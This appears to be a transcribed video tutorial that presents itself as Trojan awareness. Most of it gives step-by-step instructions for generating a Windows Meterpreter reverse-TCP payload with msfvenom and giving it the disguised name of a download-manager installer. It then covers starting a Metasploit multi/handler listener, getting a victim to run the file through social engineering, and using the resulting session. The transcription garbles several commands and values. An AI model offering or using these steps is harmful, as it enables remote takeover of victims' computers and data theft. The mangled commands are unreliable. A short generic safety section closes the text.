Hello everyone, and welcome to my channel. Today, we're going to talk about a critical topic, computer hacking and Trojans. These threats can compromise the security of our data and systems. Trojans, or Trojan horses, are malicious software that hide within seemingly legitimate programs. Once installed on your computer, they allow cybercriminals to access your confidential information, such as passwords, banking data, and even your identity. MS Venom allows you to quickly generate custom Metasploit payloads on the fly straight from the terminal. In this tutorial, I am going to give you a quick overview on how to generate a Metasploit payload with MS Venom. To create the payload, type the following command first: MS Venom p Windows Metapredator reverse underscore tcplhost equals 192. The 24th of January 168 LPORT equals 4444 FX. Internet download nager.exe. MS Venom is a tool that is part of the Metasploit framework. It allows for the generation of shellcodes for various platforms and architectures. The option p Windows Metapredator reverse underscore TCP specifies the type of payload to use. It is a shellcode that works Windows systems and uses the TCP protocol to establish a reverse connection with the attacker. Metapredator is an advanced shell that offers many features, such as file manipulation, process manipulation, registry manipulation, etc. LHOSANE equals 92.168.1.24 sets the attacker's IP address, which is the machine that will receive the shellcode connection. This address must be accessible from the victim's network. LPORT equals 4444 defines the port on which the attacker will listen for incoming connections from the shellcode. This port must be open on the attacker's firewall. The DFX option specifies the format of the file to generate. It creates an executable file that can be launched on a Windows system. The Go Internet Download Nager.exe option specifies the name of the file to create. It is Internet Download Nager.exe, which is a deceptive name intended to make the victim believe it is a legitimate software. In summary, the command creates an executable file that, when launched on a 64-bit Windows system, will connect to the address 192.168.1.24 on port 4444 and give the attacker full access to the system via Metapredator. Then we run the Metasploit by typing MS console. Now, type the below commands to select a listener and check the required fields. Use exploit multi-handler. Set payload Windows Metapredator reverse underscore TCP. Show options. Set LHOST your IP. In this tutorial I used my IP 192.168.1.24. Then type exploit J to run an exploit in the background and start a job. A job is a way of managing multiple sessions and exploits at the same time. Now, here comes the hard part. You somehow have to use any manipulation technique, such as social engineering, to make your target download and run the payload, or have to deploy it and run by yourself. Upon successful execution of the payload on the victim's system, we establish a reverse connection and gain access to the Metapredator session. With Metapredator, we can execute a multitude of commands for post-exploitation purposes. For instance, to retrieve system details, we can use the sysinfo command. To explore all available commands, simply type help in the Metapredator prompt. Now, let's talk about how to protect yourself against these attacks. First and foremost, make sure to always download software from trusted sources. Avoid suspicious links and email attachments. Secondly, keep your antivirus software and programs up to date. Regular updates can patch security vulnerabilities and protect you against new threats. In conclusion, vigilance is key to protecting yourself against Trojans and computer hacking. By adopting good security habits and staying informed about the latest threats, you can significantly reduce the risks to your digital life. Thank you for tuning in today. Don't forget to share this video to raise awareness among your loved ones. Stay safe and see you soon.